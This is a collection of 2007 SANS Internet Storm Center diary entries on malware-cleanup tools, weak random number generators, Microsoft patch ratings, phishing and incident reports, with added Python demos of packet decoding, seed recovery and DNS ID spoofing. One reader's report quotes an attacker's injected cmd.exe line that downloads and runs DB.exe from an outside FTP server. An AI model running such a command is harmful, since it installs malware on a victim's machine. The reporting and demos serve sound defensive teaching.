The guys over at RaDaJo (RAul, DAvid and JOrge) Security Blog have an article inspired by George's post featuring Anti-Rootkit tools: http://radajo.blogspot.com/2007/11/anti-rootkit-windows-tools-searching.html.
Burning a copy of irreplaceable photos and other documents to CD/DVD is time well spent, regardless of whether the system is compromised and needs to be reinstalled or not. Your relatives will likely not regret the time put into this important defensive measure. Reader Robert suggests that you can avoid a lot of drag-and-drop effort by using Areca (http://areca.sourceforge.net/).
There is a tremendous number of little programs that can give you a view into what is going on in the system. These are used during the live response stage of your holiday/family incident response. HijackThis was the overwhelming favorite, followed by huge support for the Sysinternals tools.
- Hijackthis (http://www.spywareinfo.com/~merijn/programs.php)
- Sysinternals Process Explorer (http://www.microsoft.com/technet/sysinternals/utilities/processexplorer.mspx)
- Sysinternals Autoruns (http://www.microsoft.com/technet/sysinternals/Utilities/AutoRuns.mspx)
- Sysinternals TCPView (http://www.microsoft.com/technet/sysinternals/Utilities/TcpView.mspx)
- Sysinternals Procmon (http://www.microsoft.com/technet/sysinternals/utilities/processmonitor.mspx)
- Sysinternals Filemon (http://www.microsoft.com/technet/sysinternals/utilities/filemon.mspx)
- Sysinternals Streams (http://www.microsoft.com/technet/sysinternals/FileAndDisk/Streams.mspx)
- DatFind (http://virus-protect.org/datfindbat.html) an interesting little German batch-file that reports on recently changed system files.
- LADS (http://www.heysoft.de/nt/ep-lads.htm)
- OpenPorts (http://www.topshareware.com/DiamondCS-OpenPorts-download-7334.htm)
- WhyReboot (http://exodusdev.com/products/WhyReboot/)
- Microsoft XP Change Analysis Diagnosis Tool (http://support.microsoft.com/?kbid=924732)
- XRayPC (http://www.x-raypc.com) which has some interesting client/server applications for remote tech support
Use of these tools can occupy a lot of your time and require a fair amount of experience. Russ has offered a helpful write up for a Rapid Malware Response/Analysis process (http://holisticinfosec.org/publications/MalcodeAnalysisTechniquesForIH_McRee.pdf.)
These malware analysis tools were offered up to take a closer look at the malware that has been found on the system. Using them requires a larger investment of time than many people have while visiting, but they might be handy to have in your own incident response toolkit for future use.
- Mandiant Red Curtain (http://www.mandiant.com/mrc)
- OllyDbg (http://www.ollydbg.de) a freeware debugger for tracing program execution
- PEiD (http://peid.tk) for detecting packers, cryptors and compilers
- WinDiff (http://www.grigsoft.com/download-windiff.htm) for comparing files
- XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm) for hex editing
It is sometimes easier to determine if a system is compromised by looking at the network traffic leaving the system, especially if you're familiar with protocol analysis. Commonly suggested tools were:
- Wireshark (formerly known as Ethereal) (http://www.wireshark.org)
- Nmap (http://insecure.org/) for scanning the suspected system for backdoor listeners
- SmartSniff (http://www.nirsoft.net/utils/smsniff.html) a smaller packet capture program
A few tools were submitted that promise to clean up the registry and other system files to improve system performance.
- CCleaner (http://filehippo.com/download_ccleaner/) commonly recommended by readers
- EasyCleaner (http://personal.inet.fi/business/toniarts/ecleane.htm)
Some brave and generous people offer remote tech support to their families. They have recommended:
It is not something that I would recommend or personally do. For selfish reasons, I don't look forward to late night tech support phone calls from Aunt Minnie. Nor do I like opening up a remote control panel on a machine that I'm trying to protect.
This was the focus of last year's post (how to get all of the updates for Grandma's PC together). The Offline-Update project (http://www.heise.de/ct/projekte/offlineupdate/download_uk.shtml) promises to solve the problem of building your own CD or USB drive to patch your relatives' machines that have only dial-up connections to the Internet. But what about all of those applications on the system? Attacks are moving from OS vulnerabilities to leveraging vulnerabilities in applications like audio players and PDF readers. Secunia offers a program that can inventory and assess the applications installed on the system. Details are available at: https://psi.secunia.com/.
Many submissions suggested moving the user from IE over to Firefox or Opera. They also suggested McAfee's SiteAdvisor (http://www.siteadvisor.com/) and Netcraft's Toolbar (http://toolbar.netcraft.com/).
Other protection methods
- Ensure that the firewall is enabled and configured properly.
- Enable DEP if it is available
- Tony suggests modifying the hosts file to add further protection (http://www.mvps.org/winhelp2002/hosts.htm)
- Enlist their system to submit logs to DShield
Kevin Liston (kliston at isc dot sans dot org)
17:07:17.405771 IP 192.168.178.255 > 255.255.255.255: ip-proto-139 30
        0x0000:  4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
        0x0010:  ffff ffff 0100 0200 0000 0000 0000 0000  ................
        0x0020:  0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a  ........l@....8*
        0x0030:  ab63                                     .c
17:07:17.406835 IP 192.168.178.255 > 255.255.255.255: ip-proto-139 30
        0x0000:  4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff  E..2.......W....
        0x0010:  ffff ffff 0100 0100 0000 0000 0000 0000  ................
        0x0020:  0000 1b3c 90a3 4ac1 50b7 930a b723 a181  ...<..J.P....#..
        0x0030:  431a                                     C.
A bit about the network: 3 PCs, 2 Macs running Leopard. Each Mac runs VMware with Windows XP. All the PCs run Windows XP. There is a "FritzBox" DSL router. Part of the network is wireless. Other than that, there isn't that much special about the network. The hosts run firewalls which are pretty much open locally.
No idea so far why these packets show up. They kind of look like corrupted NetBIOS packets (port 139 > protocol 139?). But why broadcast like this? Please let us know if you have any ideas.
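To make the "protocol 139, not port 139" point concrete, here is an added example (my code, not part of Johannes' diary) that decodes the IPv4 header from the hex columns above. The bytes are exactly those in the dump; nothing else is assumed. Two things fall out: tcpdump's ip-proto-139 is the 8-bit protocol field (0x8b) in the header, so no port is involved at all, and the header checksum does not verify. Over the bytes as printed, the first packet should carry 0x4796 and the second 0x4798, yet both carry 0x8c57 even though their IP IDs differ. A checksum that stays constant while the ID changes is not what an IP stack produces, which fits the "corrupted" guess.

```python
"""Decode the IPv4 header of the broadcast packets quoted in the diary.

Added example; the packet bytes are copied from the tcpdump hex dump above
and nothing else is assumed. It shows where tcpdump's "ip-proto-139" comes
from (the 8-bit protocol field, not a port) and recomputes the RFC 791
header checksum to see whether the packets are internally consistent.
"""
import struct

# Hex columns of the two dumps, copied verbatim from the diary.
PACKET_1 = bytes.fromhex(
    "4500 0032 0003 0000 ff8b 8c57 c0a8 b2ff "
    "ffff ffff 0100 0200 0000 0000 0000 0000 "
    "0000 a2c0 d297 bcc3 6c40 1ad5 d0bf 382a "
    "ab63")
PACKET_2 = bytes.fromhex(
    "4500 0032 0001 0000 ff8b 8c57 c0a8 b2ff "
    "ffff ffff 0100 0100 0000 0000 0000 0000 "
    "0000 1b3c 90a3 4ac1 50b7 930a b723 a181 "
    "431a")


def ipv4_checksum(header):
    """RFC 791 header checksum: ones' complement of the ones' complement sum of
    the 16-bit words, with the checksum field (bytes 10-11) treated as zero."""
    words = bytearray(header)
    words[10:12] = b"\x00\x00"
    if len(words) % 2:
        words.append(0)
    total = sum(struct.unpack(f"!{len(words) // 2}H", bytes(words)))
    while total >> 16:                     # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_ipv4(packet):
    """Parse the IPv4 header and return its fields plus the payload bytes.

    The dump only has option-less headers (IHL == 5), but IHL is honoured so
    packets with options are sliced correctly as well.
    """
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto,
     checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4:
        raise ValueError(f"not IPv4 (version {version})")
    header_len = ihl * 4
    return {
        "version": version,
        "header_len": header_len,
        "total_len": total_len,
        "id": ident,
        "flags": flags_frag >> 13,
        "frag_offset": flags_frag & 0x1FFF,
        "ttl": ttl,
        "protocol": proto,                      # 0x8b == 139: tcpdump's "ip-proto-139"
        "checksum": checksum,
        "checksum_computed": ipv4_checksum(packet[:header_len]),
        "src": ".".join(map(str, src)),
        "dst": ".".join(map(str, dst)),
        "payload": packet[header_len:total_len],
    }


def describe(packet):
    """One-line summary in the spirit of tcpdump -v output."""
    h = decode_ipv4(packet)
    if h["checksum"] == h["checksum_computed"]:
        cksum = "ok"
    else:
        cksum = f"bad (0x{h['checksum']:04x}, should be 0x{h['checksum_computed']:04x})"
    return (f"IP {h['src']} > {h['dst']}: proto {h['protocol']} ttl {h['ttl']} "
            f"id {h['id']} payload {len(h['payload'])} bytes, cksum {cksum}")


if __name__ == "__main__":
    for pkt in (PACKET_1, PACKET_2):
        print(describe(pkt))
```

The checksum routine is the standard one, so it can also be pointed at a pcap you trust to confirm it reports "ok" there before you draw conclusions from a "bad" on an odd capture like this one.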
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
One of the main problems the Internet security operations community faces is that although global encompassing incident response and information sharing is happening, it is on the technological and operational levels. We mostly do not know how to communicate with the policy makers. Some of us present there made head-way in the hallways (as the sessions are mostly just repeated talk).
I spoke with Dr Hamadoun Touré, the Secretary General of the ITU on some of our efforts and some of our operational needs, and was pleased to find an open mind and sincere interest. The ITU, at least as far as I understood, is concerned with Internet security, and appreciates the importance of the operational communities and the work we do.
On a surprising note, China ran a few security sessions in which its delegates showed high visibility into Internet security and abuse in China, speaking of issues of establishing trust and incident response statistics. They are highly concerned with spam, and were the only ones to speak in an operational manner. They quoted numbers from (mainly) US sources that showed spam and abuse activity in China, then indicated a drop in spam being sent from the Chinese network (spam is of key importance to them in their presentations).
On the other hand they presented an increase in phishing and botnet incidents being reported. In one slide they showed numbers on phishing reports, sorted by top-reporters. The top-5 reporters were: Verisign (probably iDefense), RSA (probably Cyota), eBay (probably eBay), CastleCops (Probably PIRT) and MarkMonitor.
But wait, there's more. The Chinese delegation also discussed mitigation success rates. In phishing, out of over 600 sites reported in one time period they mitigated just over 200. They were sincere and open about where they have to get better and, to be honest, I was in awe of them, a country I had considered to be a black hole for abuse reports. We made some new contacts and hope these will prove fruitful for future cooperation. I am highly impressed with the people I met from China.
Another subject of interest to me was my discussion with Milton Mueller on his advocacy of some information being removed from publicly accessible WHOIS data. Although ideologically I am with him on this privacy issue, practically it is the only, granted very poor, way for the Internet security operations community to take down abusive domain names today, through registrars, and the Internet can't do without it until another option is presented. I hope to work with him on solutions to this conundrum.
My lecture there was one I only found out I was giving about a month ago, after being contacted by a member of ICANN's SSAC. It was part of the Case Studies session from the Diplo Foundation ( http://www.diplomacy.edu ), where I spoke, technically, of lessons from the Estonian Internet war and how countries can defend themselves, as written in the post-mortem analysis and recommendations I wrote for the Estonian CERT. In the questions section we spoke of the importance of CERT organizations, how they are established, and of the differences in fraud as seen in different parts of the world. My fellow session members were: Robert Guerra (Canada, session moderator), Veronica Cretu (Moldova, facilitator), and the other panelists: Olga Cavalli (Argentina) and Cristine Hoepers (who manages the Brazilian CERT). I, of course, am from Israel and work for Afilias Global Registry Services.
"It is becoming time for the holidays. That means geeks spending time with families. That means geeks need to pack tools for malware cleanup. Do you guys have a CD list of tools and or procedures? This might be worth making a post about."
Being somewhat cloistered in my job, and having a couple of young advocates at home (my 14 y.o. installed her own stripped-down *nix on her laptop, the 11 y.o. asked for help with his) I don't get to stay on top of the latest Windows and Mac malware detect/remove/recover tools. As a result, while my personal faves are useful to me, they'll no doubt seem too slow/dumb/technical/esoteric/2004 for others.
What is in your holiday jump bag? Let us know at https://isc2.sans.org/contact.html and we'll post the most popular response essentials.
Thinking it over, this sort of makes sense: if you want to trick a user into (voluntarily!) downloading and installing a piece of malware that claims to be a video codec, you probably don't want to scare the user away from the sites that draw him into the spyderweb by having other malware or exploit attempts lighting up the user's anti-virus. The Zlob approach of propagating malware seems to have been quite successful for the bad guys: Not only are they still "going strong" more than a year after the first report, they also branched out to include Mac-OSX (diary) earlier this month.
Since the "codec" binaries change frequently and AV coverage is notoriously poor, probably the best defense in a corporate environment is to have a web filter in place that blocks access to porn pages. What used to be seen as a mere "compliance" measure to not run afoul of sexual harassment rules at the workplace has long since turned into a cornerstone of most companies' malware defense.
Kind of following on from Swa's post from yesterday. When we go to a banking website we check for the little padlock, when we send a confidential communication we encrypt it. Much of the internet now is dependent on strong encryption. Ecommerce relies on solid encryption, as do governments, businesses, etc. So what if encryption goes bad? Well, at best people laugh at you (remember CSS) at worst national security is compromised, or your company’s reputation is shot to pieces.
Craig (thanks) wrote in with an observation that set me thinking.
“I don’t think there is a single place in a computing system where the architecture and implementation have more critical impact then in implementation of cryptographic systems.”
We all know that if the key is compromised, the game is over. We also tend to think "I'm using AES-256, so everything should be sweet", but not all of us think about the rest of the system. For example, the pseudo-random number generator (PRNG) on Windows issue Swa talked about yesterday shows that if things aren't quite as random as you'd hoped, or if access to the generator's state can be gained, then things go awry and using a strong algorithm means nothing.
As Craig writes
“just because your pieces fit and operate as a cryptographic system, doesn’t mean that you put them together in a way that makes the cryptographic system secure”
Governments have typically recognised this issue. Many will state that unless the cryptographic product has been fully examined by them, as a government agency you are not permitted to use it to transmit anything sensitive.
If the architecture that delivers the cryptographic services has not been evaluated, then even if it uses a recognised strong algorithm it may only be approved for limited use. To me this shows that there are governments that have recognised that the way something is put together is very important. This is one area where business needs to catch up. You often hear the words "but it uses <insert favourite algorithm here>". In the world today we may need something more.
So how do you get some assurance that a product is put together in a secure manner? Many organisations and governments look at products that have been evaluated. Typically this is now under a scheme called Common Criteria (CC) (old timers will remember the Orange Book as well). One of the things to look out for is the Security Target of the device/software being evaluated. For example, there are some firewalls on the list whose Security Target does not include the VPN or encryption capabilities. So the firewalling capabilities have been verified, but the encryption functions have not. If you are a business this may still be OK to use, but if you are a government agency it may mean that you will have to purchase a separate product to provide VPN connectivity for remote users.
The devices also need to be configured in line with the Security Target and the Certification report in order to be able to comply. Over time there have been examples where a product is rated as a secure product, but only if you don’t connect it to a network (yes it was a product that provides network functionality). Again government bodies typically have to pay attention to this, business less so, but it is always good to know what has been evaluated and what has not. Also don’t forget that not all versions of the same product will be evaluated. It can be an expensive process so vendors may only have major new versions evaluated.
So next time a vendor (sorry guys) tells you "this product is rated EAL something", you may want to ask for the relevant certification report and Security Target and have a good read. An EAL number on its own says nothing about which functions were actually in scope, but it is still better than nothing.
Mark H - Shearwater
'Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin.'
The title is actually a quote from John von Neumann. And while it's over half a century old, it is still indicative of the difficulty faced by those who are forced to generate random data.
When I teach a certain awareness course for developers, one of the basic messages is not to try to reinvent crypto components, but to use proven good ones. Basically, it's just way too hard to get it perfectly right for the mere mortals among us.
In crypto you basically have 4 basic building blocks: the symmetric and asymmetric ciphers, the hash functions and the (pseudo) random number generator. With those, you can build whatever you need.
Lately the random number generator in windows seems to be under scrutiny. Basically some crypto researchers are calling it broken and the press reports that Microsoft mostly seems to deny it's a problem.
While it's rather easy to make fun of Microsoft in this, take a look at what Microsoft employees write about PRNGs and the NIST recommendation: http://rump2007.cr.yp.to/15-shumow.pdf.
- The research paper: http://eprint.iacr.org/2007/419.pdf
- Microsoft doesn't seem to have a public statement, but their position boils down to:
  - There is no security vulnerability as the information is not leaked.
  - The information is actually only released locally to authorized users, e.g. Administrators, who have wide rights anyway.
  - They encourage users to run with limited user rights.
  - They seem to be ready for what they call defense in depth (inside one machine) and to reevaluate the strength of their PRNG.
[If a Microsoft spokesperson wants to send me quotable material, feel free ...]
Still, security professionals will need to position themselves on the issue in the long run.
What do you think about it, why? Let us know and we'll summarize the best replies we get.
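To show the failure Mark and Swa are describing in working code, here is an added example (mine, not from either diary, and not a model of the Windows PRNG's internals): a 128-bit session key drawn from a general-purpose PRNG that was seeded with the clock. The cipher that later uses the key is irrelevant; its real entropy is the attacker's uncertainty about the timestamp, and a few thousand guesses recover it. The timestamp, the attacker's error and the search window are made-up values for the demo; `secrets.token_bytes` stands in for the OS source that should have been used.

```python
"""Why a strong cipher does not rescue a weak random source.

Added example, not from the diary and not Microsoft's code. It does not
model the Windows PRNG; it models the general failure the post describes
with a deliberately bad but common pattern: a key derived from a
general-purpose PRNG (Mersenne Twister) seeded with the current time. The
key is 128 bits long, so it looks fine, yet anyone who knows roughly when it
was generated recovers it by enumerating timestamps.
"""
import random
import secrets


def weak_session_key(seed_time):
    """Flawed construction: 16-byte key from a PRNG seeded with a timestamp.

    `seed_time` stands in for int(time.time()). The generator is fully
    determined by its seed, so the key has as much entropy as the seed.
    """
    rng = random.Random(seed_time)
    return rng.getrandbits(128).to_bytes(16, "big")


def recover_seed(observed_key, approx_time, window):
    """Attacker: try every timestamp within +/- window seconds of a guess.

    Returns the seed that reproduces the observed key, or None. The cost is
    2*window+1 PRNG initialisations, nowhere near the 2**128 the key length
    suggests.
    """
    for candidate in range(approx_time - window, approx_time + window + 1):
        if weak_session_key(candidate) == observed_key:
            return candidate
    return None


def strong_session_key():
    """The fix: take the key from the OS cryptographic source via secrets
    (os.urandom underneath), never from a seeded general-purpose PRNG."""
    return secrets.token_bytes(16)


def demo(true_time=1195200000, attacker_error=1800, window=3600):
    """Generate a key at `true_time` (a made-up epoch value), then recover it
    from an attacker's guess that is off by `attacker_error` seconds.
    Returns (key_hex, recovered_seed)."""
    key = weak_session_key(true_time)
    recovered = recover_seed(key, true_time + attacker_error, window)
    return key.hex(), recovered


if __name__ == "__main__":
    key_hex, seed = demo()
    print(f"victim key  : {key_hex}")
    print(f"recovered   : seed {seed} -> {weak_session_key(seed).hex()}")
    print(f"secrets key : {strong_session_key().hex()} (no seed to recover)")
```

Widening the window only scales the attacker's work linearly; the only real fix is the last function, which is why "but it uses AES-256" says nothing until you know where the key came from.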
In the last few days Apple released updates to its Tiger (10.4) and Leopard (10.5) versions of OS X.
For those unfamiliar with Mac OS X: this isn't just security patches; it is somewhat comparable to what Microsoft calls a service pack. As such it can include stability fixes, features, etc. as well as security fixes.
10.4.11 includes a long list of security fixes. Since it's an all-or-nothing deal, there's very little real use in discussing them individually. Just take the plunge: there are a few bad ones in there, so you'll need it anyway. Some readers wrote us that there might be some issues with it, so be careful. That said, I've been running it for a bit already and have not seen a single bad thing so far.
10.5.1 includes some security fixes too, all centered around the application firewall:
Apple also released patches for the beta of safari, but hey, it's beta software!
Every day we see new exploits and old, patches and vulnerabilities, DoS and DDoS. As the newest member of the Internet Storm Center, I am in data gathering mode. Even though I have been a GCIH (#50) since 2000, we as handlers have to start learning the incident handling process all over again every time we join a new team. As a new handler, my question was: where is the contact list? The first step in the incident handling process is preparation, so let's do it. Let's get this list updated.
By the way, if you need to know how to prepare for an incident, SANS has great Incident Handling Forms as a part of SCORE (Security Consensus Operational Readiness Evaluation). SCORE is “dedicated to providing a community consensus minimum standard of procedures, and checklists for overall infrastructure security." There is no need to reinvent the wheel, so check out the forms and prepare your team for an incident.
So we ask, if you are on a CIRT team and would like for us to have your team’s contact information in case we see activity you should know about, please send it to us on our contact page. We look forward to hearing from you.
Fair Winds, Mari
Nothing really major happening today, so here are couple of quick items:
- Many security fixes released by Apple today for OS X and Safari on Windows.
- There is more fallout from the salesforce.com breach. This time phishing emails were sent to recipients from the supposed "Canadian Revenue Service" (Canada tax agency).
- There is a fake Microsoft Security Update bulletin going around that looks pretty real. They seem to be customized with the recipient's full name. There is a link to malicious EXE files proclaiming to be the patch installer.
Historically, data was submitted to DShield via e-mail. I chose this method way back (Nov. 2000) as it provided easy load balancing and queuing in case the main database server was under heavy load. Initially we only had a Linux client, and of course it's trivial to send e-mail from almost any Linux host. The first client was actually a one-line shell script.
I think e-mail is still a good idea, but we are having more and more issues getting e-mail to us. In particular our Windows client, cvtwin, uses an external simple command line mailer which isn't always that easy to configure, as ISPs block port 25 and require users to log in to mail servers.
So earlier today, Wayne, our "cvtwin guy", added a new function: It will now submit data via HTTP as well as SMTP. I think in particular in Windows scenarios this makes a lot of sense. Most of our windows users are home users. They run some kind of logging software on a work station and submit logs collected by this software. These systems are used for web browsing and usually have unobstructed access to port 80.
So if you have issues running CVTWIN because you are not able to send mail, give the new version a try. And again: If it works, don't touch it ;-)
More details about CVTWIN:
Changelog (for now this serves as the documentation of the HTTP feature)
This is an experimental release at this point. Please report issues to firstname.lastname@example.org.
Overview of the November 2007 Microsoft patches and their status.
| # | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) client | ISC rating(*) server |
|---|---|---|---|---|---|---|
| MS07-061 | An input validation failure allows remote code execution. Replaces MS06-045. Windows shell - exposed via IE7, Skype, Acrobat, ... |  | Well known problem, exploit in the wild | Critical | PATCH NOW | Important |
| MS07-062 | Lack of entropy in pseudo random number generation results in weak transaction IDs and therefore in DNS spoofing vulnerabilities. DNS spoofing can lead to man-in-the-middle attacks and more. | KB 941672 | No publicly known exploits | Important | Critical | Critical(**) |
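To see why the "lack of entropy" in MS07-062 earns a Critical rating without a public exploit, here is an added simulation (mine, not Microsoft's code and not an analysis of the actual Windows generator). A resolver whose 16-bit transaction IDs come from a small predictable generator is compared with one that draws IDs from a full 16-bit random source. The attacker first provokes one query he can observe (for a name in a zone he controls), then races the real answer to the victim's next query with a burst of forged replies. The generator constants are an arbitrary choice for the example.

```python
"""Why weak DNS transaction IDs (the MS07-062 problem) matter.

Added example; it does not reproduce the Windows DNS server's generator.
A resolver whose 16-bit transaction IDs come from a small linear
congruential generator (constants chosen arbitrarily here) is compared with
one that draws IDs from a full-width random source. The attacker provokes
one observable query, then races the real answer to the victim's next query
with forged replies; he wins if any forged reply carries the awaited ID.
"""
import random

ID_SPACE = 1 << 16


class PredictableResolver:
    """IDs from a 16-bit LCG: each ID is a fixed function of the previous one,
    so observing a single ID gives away every ID that follows."""
    A, C = 25173, 13849

    def __init__(self, seed):
        self.state = seed % ID_SPACE

    def next_id(self):
        self.state = (self.A * self.state + self.C) % ID_SPACE
        return self.state


class RandomResolver:
    """IDs from a full 16-bit random source. `rng` would be the OS CSPRNG in
    real code; a seeded generator is used so the simulation is repeatable."""

    def __init__(self, rng):
        self.rng = rng

    def next_id(self):
        return self.rng.randrange(ID_SPACE)


def forged_ids_predictable(observed_id, count):
    """Attacker runs the victim's LCG forward from the one ID he observed."""
    ids, state = [], observed_id
    for _ in range(count):
        state = (PredictableResolver.A * state + PredictableResolver.C) % ID_SPACE
        ids.append(state)
    return ids


def forged_ids_blind(rng, count):
    """Attacker with no predictive edge can only spray distinct guesses."""
    return rng.sample(range(ID_SPACE), count)


def spoof_success_rate(trials, forged_per_trial, predictable, seed=2007):
    """Fraction of trials in which some forged reply matched the victim's next
    transaction ID (a float in [0, 1])."""
    rng = random.Random(seed)
    wins = 0
    for _ in range(trials):
        if predictable:
            resolver = PredictableResolver(rng.randrange(ID_SPACE))
            observed = resolver.next_id()        # the query the attacker provoked
            forged = forged_ids_predictable(observed, forged_per_trial)
        else:
            resolver = RandomResolver(rng)
            resolver.next_id()                   # provoked query reveals nothing useful
            forged = forged_ids_blind(rng, forged_per_trial)
        target = resolver.next_id()              # the query under attack
        wins += target in set(forged)
    return wins / trials


def expected_blind_rate(forged_per_trial):
    """Closed form for the full-entropy resolver: distinct guesses / 2**16."""
    return forged_per_trial / ID_SPACE


if __name__ == "__main__":
    print("predictable IDs, 1 forged reply   :", spoof_success_rate(1000, 1, True))
    print("random IDs, 64 forged replies     :", spoof_success_rate(1000, 64, False),
          "(expected about", round(expected_blind_rate(64), 4), ")")
```

With predictable IDs a single forged packet per query wins every race; with 16 bits of real entropy the attacker is down to guesses over 65536, which is why the fix is about the generator and not about filtering.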
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
Swa Frantzen -- NET2S
Mike sent us an interesting twist on a phishing scheme. The victim receives a message from a credit union whose name is associated with the victim, and it asks the victim to call the credit union on a provided phone number.
It's well targeted, so we're obfuscating the parts that identify the victim all too easily:
From an awareness point of view, the key messages to your customers/users/... are:
- not only to teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
- but also to tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)
We've checked out the phone number itself. When doing this, make sure calls to scam artists don't get traced back to you; they tend to become aggressive every so often. It seems this number is used more widely in scams like these: http://800notes.com/Phone.aspx/1-877-228-0944.
One of the fellow US based handlers called the number to validate it's not a joe-job to discredit a real institution. He found it's an automated system on the other side and it indeed asks credit card numbers, PIN, expiration date etc. It'll also tell you your card is now activated (read: if you entered valid data they will now use your card actively). Interestingly it doesn't identify the institution it's supposedly working for.
We've received several reports this morning of folks getting SQL errors from WSUS after synchronizing. The error suggests some sort of problem in the new product metadata. One report suggested it might be US only, but some forum postings elsewhere suggest that it might be hitting the UK too, so I wouldn't count on it being limited geographically. We've pinged our Microsoft contacts, but not heard back from them yet. We'll update as more info becomes available. Thanks to Mark and Dennis for bringing this to our attention.
Juha-Matti reminded us of a new Google cross-site scripting issue related to a recent JAR: protocol vulnerability in Firefox that was reported by Petko D Petkov on Saturday:
Marcus H. Sachs
Director, SANS Internet Storm Center
In the news this past week were the ominous stories about a Cyber Jihad on November 11th. OK terrorists, it's November 11th and we haven't seen your little Jihad yet. As Johannes said in his diary a few days ago, it seems to have been called off. What happened? If there are any terrorists hanging out here reading this diary I'd like to hear from you. Please use our contact page.
This whole cyber terrorism thing has always bothered me, especially since every time some nut decides that the "next attack" is going to be against an online target the press goes into hyper alert mode. Folks, let's get serious about this for a few minutes. I know that this is politically incorrect, but the odds of a terrorist group "terrorizing" the Internet with cyber bullets and e-bombs are about as small as the odds of the Morse Code coming back as a primary means of communication. It's not zero, but it's also not much more than zero. (Remember, math fans, that odds are a comparison expression such as 1:20 or 1:100 and can also be expressed as a real number by dividing the first value by the second.) The terrorists use the Internet for the same thing everybody else does - communicating with each other. They also use it to raise money through criminal activity, then launder it via one of the many electronic payment systems. Ever look at the spam and phishing junk mail you receive? It's not just the Russian Business Network operating in the shadows. With the Internet providing near-perfect communications and a seemingly endless supply of money why would a terrorist group want to blow it up?
So for those looking for something to do while we remember our military veterans and fallen comrades in arms today (don't forget today is Armistice Day, also known as Veterans Day or Remembrance Day in several countries), think about how a terrorist group might actually go about terrorizing the Internet. Send us your ideas and we'll publish them here. The point is to learn from this exercise, to see what is possible and then to ask what we can do to prevent it or mitigate any consequences should it happen.
Thank You, Veterans, for your service to your country!
Marcus H. Sachs
Director, SANS Internet Storm Center
Previously, we often warned people against visiting unknown or suspicious websites as they could contain malicious content. But nowadays you can be affected even when visiting known websites. It was reported that the India Times website contained hundreds of malicious files that could infect those who visit it.
Legitimate websites containing malicious content is nothing new; it has already happened a number of times. Web administrators must be prudent to ensure their websites are properly secured. Attackers are now clever enough not to deface your website and alert you, but rather to plant malicious content on it and wait for victims. Periodically running a vulnerability scan on your web systems is necessary to avoid known holes. Let us know if you have other good tips for web admins.
Our reader Oscar shared with us that when he was playing World of Warcraft, he suddenly lost control and some "strange" lines appeared (injected command strings displayed within his WoW session). Below is a screenshot.
As he was also running a VNC server with a fairly easily guessed password, this is what he got, a couple of files:
If you have encountered a similar experience, let us know.
Lesson learnt: if you expose any service to the Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.
Oscar wrote back and gave us a detailed description of what happened.Â Here is what he said:
So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.
So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"
then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, didÂ a mget * and thought the SANS folks would be interested in these files.
Now, how did they get in?Â My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password.Â Well, the password i picked was pretty guessable.Â When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in.Â Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted.Â Thank goodness I wasn't
A question for our readers: has anybody seen this happen to their session in WoW or any other virtual world simulation?
a.b.c.d - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html?date=2007-11-09 HTTP/1.0" 200 500572 "-" "gsa-crawler (Enterprise; S5-FTNF3BWZPUJAS; email@example.com)" "-"
At first, I thought "oh well, it's Google". But looking at the user agent string more closely reveals some subtle differences. This is a Google Search Appliance, not the uber-google-bot we all love. The regular Googlebot looks like this:
188.8.131.52 - - [09/Nov/2007:15:24:37 +0000] "GET /date.html?port=47109&date=2007-10-25 HTTP/1.1" 200 7538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
I have seen similar cases a few times now. While this one was not malicious, in some cases attackers have used Google's (or other search engines') user agent strings. I can only assume that this is an attempt to blend in better, and maybe to retrieve the search-engine version of the page. If anybody knows a good reference for the IP address ranges used by particular search engines, let us know.
